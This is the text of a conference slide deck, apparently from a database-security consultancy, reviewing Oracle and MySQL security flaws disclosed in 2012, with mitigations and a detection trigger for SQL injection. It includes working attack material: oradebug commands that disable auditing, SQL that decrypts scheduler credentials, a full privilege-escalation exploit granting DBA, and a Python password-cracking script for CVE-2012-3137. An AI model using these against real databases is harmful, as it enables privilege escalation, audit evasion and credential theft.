best of oracle security 2012 - red-database-security · oradebug! undocumented function in oracle!...

Best of Oracle Security 2012Best of Oracle Security 2012What happened in 2012

Agenda

! Recapitulation 2011! January 2012 - October 2012! Q&A

Recapitulation 2011

Oradebug

! Undocumented function in Oracle

! Details published in 2011 (Hacktivity 2011*)

! Allows to run OS commands

! Allows to disables normal and SYS Auditing

! Can‘t be audited

! Platform independent solution without poke added

* http://soonerorlater.hu/download/hacktivity_lt_2011_en.pdf

Oradebug

! Undocumented function in Oracle

! Details published in 2011 (Hacktivity 2011*)

! Allows to run OS commands

! Allows to disables normal and SYS Auditing

! Can‘t be audited

! Platform independent solution without poke added

* http://soonerorlater.hu/download/hacktivity_lt_2011_en.pdf

UNFIXED

Disable Oracle AuditingSQL> oradebug setmypid

Statement processed.

SQL> oradebug setvar sga kzaflg_ 0

BEFORE: [1492F4EC0, 1492F4EC4) = 00000001

AFTER: [1492F4EC0, 1492F4EC4) = 00000000

2012 - The Good, The Bad, The Ugly

The good

Lowest number of vulnerabilities in Oracle

database ever

! Only 17 findings in 2012 (2011: 29, 2010: 31)

! More (8) remote exploitable bugs (2011: 5 )

The good

Lowest number of vulnerabilities in Oracle

database ever

! Only 17 findings in 2012 (2011: 29, 2010: 31)

! More (8) remote exploitable bugs (2011: 5 )

• January 2012 CPU (2 Vulnerabilities – 1 remote)

• April 2012 CPU (6 Vulnerabilities – 3 remote)

• July 2012 CPU (4 Vulnerabilities – 3 remote)

• October 2012 CPU (5 Vulnerabilities – 1 remote)

The bad

Critical bugs are not fixed (only workarounds)

! SCN bug was not fixed

! TNS Poisoning was not fixed

! Stealth Password Cracking was not fixed

The ugly

Oracle Corporation

! Really bad communication skills (TNS poisoning)

! Unwilling to fix problems (TNS poisoning, stealth

password cracking)

! Customer is guilty for not fixing issues: „Customers

have requested that Oracle not include such security

fixes into Critical Patch Updates ...“

2012

January 2012

* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html ** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0

January 2012

• Oracle CPU January 2012 *

* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html ** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0

January 2012

• Oracle CPU January 2012 *

• Problem with large Sequence Change Numbers

(SCN) **

* http://www.oracle.com/technetwork/topics/security/cpujan2012-366304.html ** http://www.infoworld.com/d/security/fundamental-oracle-flaw-revealed-184163-0

January 2012 CPU*

• 2 security fixes (1 remote exploitable)

• Core RDBMS

• TNS Listener

SCN Problem

! When Oracle databases link to each other, maintaining data consistency requires them to synchronize to a common SCN. The highest SCN is taken.

! Due to a problem in the backup the SCN increases dramatically

! Undocumented parameter _minimum_giga_scn allows to set parameters to a dedicated value

! Backup bug and undocumented parameter was fixed/removed via the January 2012 CPU.

* http://www.gokhanatil.com/2012/01/fundamental-oracle-flaw-revealed-lets.html

SCN Problem

! When Oracle databases link to each other, maintaining data consistency requires them to synchronize to a common SCN. The highest SCN is taken.

! Due to a problem in the backup the SCN increases dramatically

! Undocumented parameter _minimum_giga_scn allows to set parameters to a dedicated value

! Backup bug and undocumented parameter was fixed/removed via the January 2012 CPU.

* http://www.gokhanatil.com/2012/01/fundamental-oracle-flaw-revealed-lets.html

UNFIXED

SCN: 10 Mio

DB1

SCN: 10 Mio

DB1

DB2

SCN: 2 Mio

SCN: 10 Mio

DB1

DB2

SCN: 2 Mio

Database Link

SCN: 10 Mio

DB1

DB2

SCN: 2 Mio

Database Link

Compare 10 Mio vs. 2 Mio

Take the highest number

SCN: 10 Mio

DB1

DB2

SCN: 2 Mio

Database Link

Compare 10 Mio vs. 2 Mio

Take the highest number

Undocumented Oracle Parameter

or

Backup bug is dramatically increasing the SCN

Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN

Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN

Attacker

Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN

Attacker

Database Link

SCN: Huge SCN

Use undocumented parameter and set the the time of the attacker databaseto set point in future and use a huge SCN

Attacker

DB2

SCN: Huge SCN

DB Crash after a while

Database Link

SCN: Huge SCN

February 2012

• Get DBMS_SCHEDULER.CREATE_CREDENTIAL

cleartext password *

• DBMS_SCHEDULER opens a port 4444 if

undocumented parameters are used **

* http://berxblog.blogspot.com.au/2012/02/restore-dbmsschedulercreatecredential.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed:+orana+(OraNA** http://berxblog.blogspot.com.au/2012/02/some-tracing-events-in-dbmsscheduler.html

February 2012

• Get DBMS_SCHEDULER.CREATE_CREDENTIAL

cleartext password *

• DBMS_SCHEDULER opens a port 4444 if

undocumented parameters are used **

* http://berxblog.blogspot.com.au/2012/02/restore-dbmsschedulercreatecredential.html?utm_source=dlvr.it&utm_medium=twitter&utm_campaign=Feed:+orana+(OraNA** http://berxblog.blogspot.com.au/2012/02/some-tracing-events-in-dbmsscheduler.html

Featu

re

exec DBMS_SCHEDULER.CREATE_CREDENTIAL(  credential_name => 'local_credential',   username => 'oracle',  password => 'welcome1');

select o.object_name credential_name, username, password  FROM SYS.SCHEDULER$_CREDENTIAL c, DBA_OBJECTS o WHERE c.obj# = o.object_id;

CREDENTIAL_NAME    USERNAME PASSWORD------------------ -------- ------------------------------------LOCAL_CREDENTIAL   oracle   BWVYxxK0fiEGAmtiKXULyfXXgjULdvHNLg==LOCAL_CREDENTIAL2  oracle2  BWyCCRtd8F0zAVYl44IhvVcJ2i8wNUniDQ==

SELECT u.name CREDENTIAL_OWNER, O.NAME CREDENTIAL_NAME, C.USERNAME,   DBMS_ISCHED.GET_CREDENTIAL_PASSWORD(O.NAME, u.name) pwdFROM SYS.SCHEDULER$_CREDENTIAL C, SYS.OBJ$ O, SYS.USER$ UWHERE U.USER# = O.OWNER#   AND C.OBJ#  = O.OBJ# ;

CREDENTIAL_OWNER CREDENTIAL_NAME      USERNAME PWD---------------- -------------------- -------- --------SYS              LOCAL_CREDENTIAL     oracle   welcome1SYS              LOCAL_CREDENTIAL2    oracle2  welcome1

Decrypt Oracle Scheduler Credentials

...bit 0x20000 - start DBMS_DEBUG_JDWP.CONNECT_TCP in file watcherbitand( ,131072)starts DBMS_DEBUG_JDWP.CONNECT_TCP on localhost, port 4444 I'm not sure if I like this event. In general I don't want any software opening connections without my knowing. And I could not find this documented anywhere. Is it fair to call this a backdoor?...

Due to undocumented functionality DBMS_SCHEDULER

listens a port 4444 if a special parameter is used.

Scheduler Credentials

March 2012

• Disabling Oracle trigger on a per-session basis *

• Self-Defending Databases **

* http://www.pythian.com/news/30781/disabling-triggers-per-session/ ** http://www.red-database-security.com/wp/selfdefending_databases_hashdays_2012.pdf

SQL> exec dbms_xstream_gg.set_foo_trigger_session_contxt(fire=>true); PL/SQL procedure successfully completed.

Disable Oracle Triggers for a session

Disable all triggers for a session. This could be used to

bypass shadow/history table architectures.

SQL> exec dbms_xstream_gg.set_foo_trigger_session_contxt(fire=>true); PL/SQL procedure successfully completed.

Disable Oracle Triggers for a session

Disable all triggers for a session. This could be used to

bypass shadow/history table architectures.

Featu

re

Self-defending Databases

• Nearly every SQL Injection abused from the web is creating

errors in the database

Self-defending Databases

• Nearly every SQL Injection abused from the web is creating

errors in the database

• A typical attacks takes less than 2 minutes to download data

Self-defending Databases

• Nearly every SQL Injection abused from the web is creating

errors in the database

• A typical attacks takes less than 2 minutes to download data

• 2 minutes are to short for humans to react

Self-defending Databases

• Nearly every SQL Injection abused from the web is creating

errors in the database

• A typical attacks takes less than 2 minutes to download data

• 2 minutes are to short for humans to react

• But the database itself is able to detect these kind of attacks

by looking at specific error messages created by the SQL

injection attack

Self-defending Databases

• Nearly every SQL Injection abused from the web is creating

errors in the database

• A typical attacks takes less than 2 minutes to download data

• 2 minutes are to short for humans to react

• But the database itself is able to detect these kind of attacks

by looking at specific error messages created by the SQL

injection attack

• After detection the appropriate countermeasures could be

taken.

22

22

23

23

23

Detection of SQL Injection Attacks (from the web)

• Depending from the used attack method (UNION, extend query, create

error messages to retrieve data, …) a specific error will be created

e.g.

ORA-01789: query block has incorrect number of result columns

• Or

Microsoft OLE DB Provider for ODBC Drivers error '80040e07' [Microsoft]

[ODBC SQL Server Driver][SQL Server]Syntax error converting the

nvarchar value ’mypassword' to a column of data type int. /

Administrator/login.asp, line 27

Detection of SQL Injection Attacks (from the web)

Out-of-the-box Databases like Oracle or Microsoft SQL Server are able to

detect SQL specific error messages and can run (custom) code

(=countermeasure) after the detection.

These specific database errors only occur if a vulnerability exists and this

vulnerability was triggered by a specific string (e.g. “or 1=1--”)

False positives are rare. A false positive could occur if a developers are

deploying applications with incorrect SQL statement (e.g. missing single

quote).

SQL Injection Error Codes Oracle - IError code Error Message Typical Command

ORA-00900

ORA-00906

ORA-00907

ORA-00911

ORA-00917

ORA-00920

ORA-00923

ORA-00933

ORA-00970

ORA-01031

ORA-01476

ORA-01719

ORA-01722

invalid SQL statement  

missing left parenthesis  

missing right parenthesis  

invalid character e.g. PHP MAGIC_QUOTES_GPC activated and attempt to inject a single quote

missing comma  

invalid relational operator  

FROM keyword not found where expected  

SQL command not properly terminated  

missing WITH keyword  

insufficient privileges Attempted privilege escalation

divisor is equal to zero Blind SQL Injection attempt (e.g. sqlmap)

outer join operator not allowed in operand of OR or IN

invalid number Enumeration with rownum and current rownum does not exist

SQL Injection Error Codes Oracle - IIError code Error Message Typical CommandORA-01742

ORA-01756

ORA-01789

ORA-01790

ORA-24247

ORA-29257

ORA-29540

ORA-31011ORA-19202

comment not properly terminated inline comment, e.g optimizer hint is not properly terminatedquoted not properly terminated single quote not properly terminated

query block has incorrect number of result columns

Attempt to use UNION SELECT

expression must have same datatype as corresponding

Attempt to use UNION SELECT

network access denied by access control list

Oracle ACL has blocked the usage of UTL_INADDR (or similar)

Host %S unknown Attempted SQL Injection via utl_inaddr

Class does not exist Attempted utl_inaddr attempt but Java is not installed

XML parsing failed SQL Injection attempt via xmltypeError occurred in XML processing SQL Injection via extractvalue

CREATE OR REPLACE TRIGGER after_error AFTER SERVERERROR ON DATABASE DECLARE sql_text ORA_NAME_LIST_T; v_stmt CLOB; -- SQL statement causing the problem n NUMBER; -- number of junks for constructing the sql statement causing the error v_program VARCHAR2(64); v_serial number; v_sid number;BEGIN-- Version 1.00select program,serial#,sid into v_program,v_serial,v_sid from v$session where sid=sys_context('USERENV', 'SID'); -- construct the sql text n := ora_sql_txt(sql_text); -- IF n >= 1 THEN FOR i IN 1..n LOOP v_stmt := v_stmt || sql_text(i); END LOOP; END IF; --

FOR n IN 1..ora_server_error_depth LOOP

IF (lower(v_program) = 'iis.exe') -- add your own application server and (ora_server_error(n) in ('942','900','906','907','911','917','920','923','933','970','1031','1476','1719','1722','1742','1756','1789','1790','19202','24247','29257','29540','31011')) THEN -- Potential attack was detected -- 1. Monitor the attack -- 2. Send an email to the responsible person (DBA/MoD) -- send_email (e.g. via utl_smtp ) -- 3. Lock database user used by the webapp execute immediate ('ALTER USER /* Error_Trigger */ "'|sys_context('USERENV','SESSION_USER')||'" account lock'); -- 4. Terminate Session execute immediate ('ALTER SYSTEM /* Error_Trigger */ KILL SESSION '''||v_sid||','||v_serial||''' account lock'); alter system kill session 'session-id,session-serial'  -- 5. Other countermeasures

END IF;  END LOOP; --END after_error;/

April 2012

• Oracle CPU April 2012 *

• TNS Poisoning **

• Critical MySQL Bug published ***

* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html ** http://seclists.org/fulldisclosure/2012/Apr/343*** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql

April 2012 CPU*

• 6 security fixes (3 remote exploitable)

• Core RDBMS

• OCI

• Enterprise Manager

* http://www.oracle.com/technetwork/topics/security/cpuapr2012-366314.html

TNS Poisoning

• Reported by Joxean Koret in 2008 to Oracle*

• Everyone with access to the listener can redirect any

network traffic by registering a second listener.

• Affects all versions of Oracle (8i-11g R2)

• Due to a communication problem („was fixed in a

future version“) the founder of this bug released an

advisory including proof-of-concept code (for SIDs

mit 6 characters).

• To implement a workaround Oracle even changed

the license agreement for RAC (inclusion of

Advanced Security Option ASO) to be able to

protect RAC.

* http://seclists.org/fulldisclosure/2012/Apr/204

TNS Poisoning

• Reported by Joxean Koret in 2008 to Oracle*

• Everyone with access to the listener can redirect any

network traffic by registering a second listener.

• Affects all versions of Oracle (8i-11g R2)

• Due to a communication problem („was fixed in a

future version“) the founder of this bug released an

advisory including proof-of-concept code (for SIDs

mit 6 characters).

• To implement a workaround Oracle even changed

the license agreement for RAC (inclusion of

Advanced Security Option ASO) to be able to

protect RAC.

UNFIXED

* http://seclists.org/fulldisclosure/2012/Apr/204

Listener

Attacker Listener

Attacker Listener

Register Additional Listener

Attacker Listener

Attacker Listener

Victim

Logon

Attacker Listener

Victim

Logon

Redirect Network Traffic of the victim

Attacker Listener

Victim

Logon

Redirect Network Traffic of the victim

Forward to the database again

Attacker Listener

Victim

Logon

Redirect Network Traffic of the victim

Forward to the database again

Attacker is now manin the middle (MITM)

Attacker Listener

Victim

Logon

Redirect Network Traffic of the victim

Forward to the database again

Attacker ListenerRedirect Network Traffic of the victim

Forward to the database again

TNS Poisoning - Statements Oracle*

• Oracle: „The fix is very complex and it is extremely

risky to backport.“

• Oracle: „This fix is in a sensitive part of our code where

regressions are a concern.„

• Oracle: „Customers have requested that Oracle not

include such security fixes into Critical Patch Updates

that increases the chance of regressions.“

• Oracle: „To protect the interest of our customers, we

do not provide these level of details (like versions

affected) for the issues that are addressed as in-

depth. The future releases will have the fix.“

* http://seclists.org/fulldisclosure/2012/Apr/343

TNS Poisoning - Statement Researcher *

• Joxean: „So, as previously stated, this is a 0day

vulnerability with no patch, Oracle refuses to patch

the vulnerability in *any* existing version and Oracle

refuses to give details about which versions will have

the fix. But they say the vulnerability is fixed. Cool.“

* http://seclists.org/fulldisclosure/2012/Apr/343

TNS Poisoning - Workarounds

• There are different workarounds available (COSTS

parameter, dynamic registration, restricted_nodes)

• There 2 documents for non-RAC and RAC systems

available in Oracle MyOracleSupport (1453883.1 ,

1340831.1) describing the workarounds

• Testing is necessary to avoid side-effects (e.g. Grid-

Control, ip restriction sqlnet.ora & IPC)

• set dynamic_registration=off

MySQL - Password Problem*,**

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow

MySQL - Password Problem*,**

! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow

MySQL - Password Problem*,**

! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"

! Pwnie for Best Server-Side Bug

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow

MySQL - Password Problem*,**

! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"

! Pwnie for Best Server-Side Bug

! Free Scanner/Script to abuse this vulnerability available **

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow

MySQL - Password Problem*,**

! On vulnerable versions of MySQL simply asking to authenticate repeatedly enough times is enough to bypass authentication: "Can I log in as root now?""How about now?""Now?"

! Pwnie for Best Server-Side Bug

! Free Scanner/Script to abuse this vulnerability available **

* http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2122** https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql *** https://community.rapid7.com/community/infosec/blog/2012/09/20/cve-2012-2122-mysql-password-vulnerability-scanner-scannow

May 2012

• nothing special happened

June 2012

• nothing special happened

July 2012

• Oracle CPU July 2012 *

* http://www.oracle.com/technetwork/topics/security/cpujul2012-392727.html

July 2012 CPU*

• 4 security fixes (3 remote exploitable)

• Core RDBMS

• Enterprise Manager

• Network Layer

• Hidden Security bug in Oracle Text (Blackhat

0day) was fixed without being mentioned.

• Fixing security bugs without documenting it, is a

common Oracle practice.

August 2012

• 0day privilege escalation exploit

(CVE-2012-3132) for Oracle 11g released at

BlackHat 2012 Las Vegas *

• Out-of-Band Patch for Oracle **

(„Oracle Database Server versions 11.2.0.2 and

11.2.0.3 do not require patching if the July 2012

Critical Patch Update has been applied.“)

* http://www.slaviks-blog.com/2012/08/03/another-blackhat-another-oracle-0day/** http://www.oracle.com/technetwork/topics/security/alert-cve-2012-3132-1721017.html

connect blackhat/password

set role dba; -- throws an error

create or replace function X return varchar authid current_user ispragma autonomous_transaction;beginexecute immediate 'GRANT DBA TO BLACKHAT';commit;return 'FOO';END;/

grant execute on X to public;

create table pwnoracle (id number(20) not null, "FOO'||BLACKHAT.X||'BAR" BLOB);

create index i_pwnoracle on pwnoracle("FOO'||BLACKHAT.X||'BAR") indextype is ctxsys.context;

exec dbms_stats.gather_table_stats(USER,'PWNORACLE',cascade=>TRUE);

drop table pwnoracle;

set role dba;

September 2012• Stealth Password Cracking Exploit released

• Cleartext passwords at OCI Client Side

• Metasploit/Meterpreter Modules for

• TNS Poisoning

• Get Cleartext passwords clientside

• Get Cleartext passwords serverside

• Run OS Commands (via oradebug)

• Side Channel attack on ORA-00942

Stealth Password Cracking! Flaw in the Oracle Logon Protocol (CVE-2012-3137) *

! Esteban Fayo found this issue 1 year ago and gave a talk „Cryptographic flaws in Oracle Database authentication protocol“ at the Ekoparty because Oracle was unwilling to fix this issue

! Due to a flaw in the logon protocol (Version 11) an attacker can crack passwords without invalid login attempts

! Incomplete Logon is not audited

! Oracle did not fix this problem. They removed the OLogon 11 Protocol if CPU October 2012 applied and recommend using the old DES hashes.==> this could cause compatibility problems with clients < 11.2.0.3

* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137

Stealth Password Cracking! Flaw in the Oracle Logon Protocol (CVE-2012-3137) *

! Esteban Fayo found this issue 1 year ago and gave a talk „Cryptographic flaws in Oracle Database authentication protocol“ at the Ekoparty because Oracle was unwilling to fix this issue

! Due to a flaw in the logon protocol (Version 11) an attacker can crack passwords without invalid login attempts

! Incomplete Logon is not audited

! Oracle did not fix this problem. They removed the OLogon 11 Protocol if CPU October 2012 applied and recommend using the old DES hashes.==> this could cause compatibility problems with clients < 11.2.0.3

* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137

UNFIXED

Stealth Password Cracking I

Stealth Password Cracking I

Attacker

Stealth Password Cracking I

Attacker

Stealth Password Cracking I

Attacker1.) Logon: SYSTEM

Stealth Password Cracking I

Attacker

Stealth Password Cracking I

Attacker

Stealth Password Cracking I

Attacker

2.) Get Hash and Salt of User SYSTEM (USER$.SPARE4)

Stealth Password Cracking I

Attacker

2.) Get Hash and Salt of User SYSTEM (USER$.SPARE4)

3.) Generate a session key and fill the short session key with \x08\x08\x08\x08\x08\x08\x08\x08

Stealth Password Cracking I

Attacker

3.) Generate a session key and fill the short session key with \x08\x08\x08\x08\x08\x08\x08\x08

Stealth Password Cracking I

Attacker

Stealth Password Cracking I

Attacker

4.) Send Salt + encrypted Session Key

Stealth Password Cracking I

Attacker

Stealth Password Cracking I

Attacker

5.) Stop logon process(no PW sent -> not invalid login attempt)

Stealth Password Cracking I

Attacker

5.) Stop logon process(no PW sent -> not invalid login attempt)

6.) Generate Password Hash (e.g. SHA1(manager||salt))

Stealth Password Cracking I

Attacker

5.) Stop logon process(no PW sent -> not invalid login attempt)

6.) Generate Password Hash (e.g. SHA1(manager||salt))

7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)

Stealth Password Cracking I

Attacker

5.) Stop logon process(no PW sent -> not invalid login attempt)

6.) Generate Password Hash (e.g. SHA1(manager||salt))

7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)

8.) Check if decrypted results contains\x08\x08\x08\x08\x08\x08\x08\x08

Stealth Password Cracking I

Attacker

5.) Stop logon process(no PW sent -> not invalid login attempt)

6.) Generate Password Hash (e.g. SHA1(manager||salt))

7.) Decrypt (AES) the encrypted session key with the hash generated in 6.)

8.) Check if decrypted results contains\x08\x08\x08\x08\x08\x08\x08\x08

9.) If true then password foundelse try a new password

Stealth Password Cracking II

! Attacker sends an username (e.g. SYSTEM) without a password to the database

! The database reads the password hash of the user SYSTEM

! A newly generated session key is padded with \x08\x08\x08\x08\x08\x08\x08\x08

! The result is encrypted (AES) with the password salt of the user

! The encrypted session key + the salt is sent to the attacker

! Attacker stops the login process

* http://threatpost.com/en_us/blogs/flaw-oracle-logon-protocol-leads-easy-password-cracking-092012 ** http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-3137

Stealth Password Cracking III

! Attacker now generate SHA1 hashes for common passwords using the salt received from the database

! This hash is used to decrypt the received session key

! If the decrypted result contains \x08\x08\x08\x08\x08\x08\x08\x08 the password is known

Pseudo-Code! users.txt (list of common users)

dict.txt (common passwords)

! for all entries in users.txt do result:=send_logon_paket(USERNAME) if result contains a salt -- we found a valid user do for all passwords in dict.txt do hash:=sha1(password||salt) decres:=decrypt_aes(session_key,hash) if decres contains \x08\x08\x08\x08 then print „password found“ od od od

! Thousands of (local) tests could be done in a second.Only 1 network packet per username

import hashlib from Crypto.Cipher import AES

def decrypt(session,salt,password): pass_hash = hashlib.sha1(password+salt)

key = pass_hash.digest() + '\x00\x00\x00\x00' decryptor = AES.new(key,AES.MODE_CBC) plain = decryptor.decrypt(session) return plain

session_hex = 'EA2043CB8B46E3864311C68BDC161F8CA170363C1E6F57F3EBC6435F541A8239B6DBA16EAAB5422553A7598143E78767'

salt_hex = 'A7193E546377EC56639E'

passwords = ['test','password','oracle','demo']

for password in passwords: session_id = decrypt(session_hex.decode('hex'),salt_hex.decode('hex'),password) print 'Decrypted session_id for password "%s" is %s' % (password,session_id.encode('hex')) if session_id[40:] == '\x08\x08\x08\x08\x08\x08\x08\x08': print 'PASSWORD IS "%s"' % password break

Stealth Password Cracking II

! Tools already exist (John the Ripper)

! Up to 1 Million passwords/second tests

Mitigation of the problem

! (No Patch) Switch back to the old DES password hashes by using the parameter

SEC_CASE_SENSITIVE_LOGON=FALSE

! Oracle October 2012 CPU removes the vulnerable protocol and automatically switch back to Ologon V10

! Set

sqlnet.allowed_logon_version=12

to Ologon Protocol V12. This requires 11.2.0.3 client

DerbyCon / Hacktivity Presentation of László Tóth and Ferenc Spala

! Presentation about database security without SQL Injection

! New flaw in the OCI driver

! Presentation of tools for Metasploit to run os commands, abuse the TNS poisoning bug and get cleartext passwords (server and client).

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

OCI Driver & Database Password

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

OCI Driver & Database Password

! Flaw in the OCI driver

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

OCI Driver & Database Password

! Flaw in the OCI driver

! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

OCI Driver & Database Password

! Flaw in the OCI driver

! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.

! Even if the database session is closed the password (and username) stays in memory

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

OCI Driver & Database Password

! Flaw in the OCI driver

! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.

! Even if the database session is closed the password (and username) stays in memory

! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

OCI Driver & Database Password

! Flaw in the OCI driver

! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.

! Even if the database session is closed the password (and username) stays in memory

! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords

! A trojan running on a DBA machine could use this to collect the decrypted passwords

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

OCI Driver & Database Password

! Flaw in the OCI driver

! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.

! Even if the database session is closed the password (and username) stays in memory

! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords

! A trojan running on a DBA machine could use this to collect the decrypted passwords

! No workaround/fix is available

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

OCI Driver & Database Password

! Flaw in the OCI driver

! Password at the client side is stored encrypted (DES) in memory after the logon process was completed.

! Even if the database session is closed the password (and username) stays in memory

! Laszlo and Ferenc released a tool for Metasploit to read and decrypt these passwords

! A trojan running on a DBA machine could use this to collect the decrypted passwords

! No workaround/fix is available

* http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

UNFIXED

Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.

Metapreter is an advanced payload for Metasploit

Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.

Metapreter is an advanced payload for Metasploit

! Metasploit Module: oradebugRun OS commands via oradebug call system

Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.

Metapreter is an advanced payload for Metasploit

! Metasploit Module: oradebugRun OS commands via oradebug call system

! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy

Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.

Metapreter is an advanced payload for Metasploit

! Metasploit Module: oradebugRun OS commands via oradebug call system

! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy

! PYTNSPROXY: TNS proxy which is used together with the tnspoison metasploit module

Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.

Metapreter is an advanced payload for Metasploit

! Metasploit Module: oradebugRun OS commands via oradebug call system

! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy

! PYTNSPROXY: TNS proxy which is used together with the tnspoison metasploit module

! Meterpreter extension: oraloglogs cleartext passwords by hooking into encryption/decryption routine of the DB server

Metasploit / Meterpreter Modules! Metasploit is a open-source security framework.

Metapreter is an advanced payload for Metasploit

! Metasploit Module: oradebugRun OS commands via oradebug call system

! Metasploit Module: tnspoison Allows to redirect network traffic to pytnsproxy

! PYTNSPROXY: TNS proxy which is used together with the tnspoison metasploit module

! Meterpreter extension: oraloglogs cleartext passwords by hooking into encryption/decryption routine of the DB server

! Meterpreter extension: ocioraloglogs the cleartext password from the OCI driver

Concept

! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.

Concept

! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.

! If a SYSDBA connects to the database server the session could be overtaken

Concept

! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.

! If a SYSDBA connects to the database server the session could be overtaken

! The oradebug feature is used to inject code in the process space of the database and hook into the decrypt functions

Concept

! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.

! If a SYSDBA connects to the database server the session could be overtaken

! The oradebug feature is used to inject code in the process space of the database and hook into the decrypt functions

! All database passwords are written in cleartext into a textfile (contains all passwords including DB Vault)

Concept

! Metasploit is used to run TNS poisoning and redirect the TNS traffic to the PYTNSproxy.

! If a SYSDBA connects to the database server the session could be overtaken

! The oradebug feature is used to inject code in the process space of the database and hook into the decrypt functions

! All database passwords are written in cleartext into a textfile (contains all passwords including DB Vault)

! File with passwords can be transferred to the computer of the attacker.

Run OS Commands from the web

http://soonerorlater.hu/download/DerbyCon2.0_think_differently_spala_toth.pdf

Side Channel attack on ORA-00942 *

! Martin Berger showed that a side channel attack is possible against Oracle and ORA-00942 *

! The number of recursive calls and count execute allows to find out if object exists.

* http://berxblog.blogspot.com.au/2012/09/side-channel-attack-on-ora-00942.html

Run OS Commands from the web3

select"ms.sid,"ms.statistic#,"sn.name,"ms.value"from"v$mystat"ms,"V$STATNAME"sn"where"sn.name"in"('recursive"calls',"'execute"count')"and"ms.statistic#"="sn.statistic#"order"by"2;

SQL> select * from a.uztrfghj;select * from a.uztrfghj *ERROR at line 1:ORA-00942: table or view does not exist21 recursive calls 3 execute count

No user ZZZ exists, but a user A exists. (but no table A.UZTRFGHJ) There is one more recursive call if the user exists.

SQL> select * from a.m ;select * from a.m *ERROR at line 1:ORA-00942: table or view does not exist26 recursive calls 7 execute count

Now there are even more recursive calls and execute count. The Table A.M exists.

October 2012

• Oracle CPU October 2012 *

• Application Security of Core Banking Systems **

* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html** https://www.sec-consult.com/en/Vulnerability-Lab/Studies.htm

October 2012 CPU*

• 5 security fixes (1 remote exploitable)

• Core RDBMS

* http://www.oracle.com/technetwork/topics/security/cpuoct2012-1515893.html

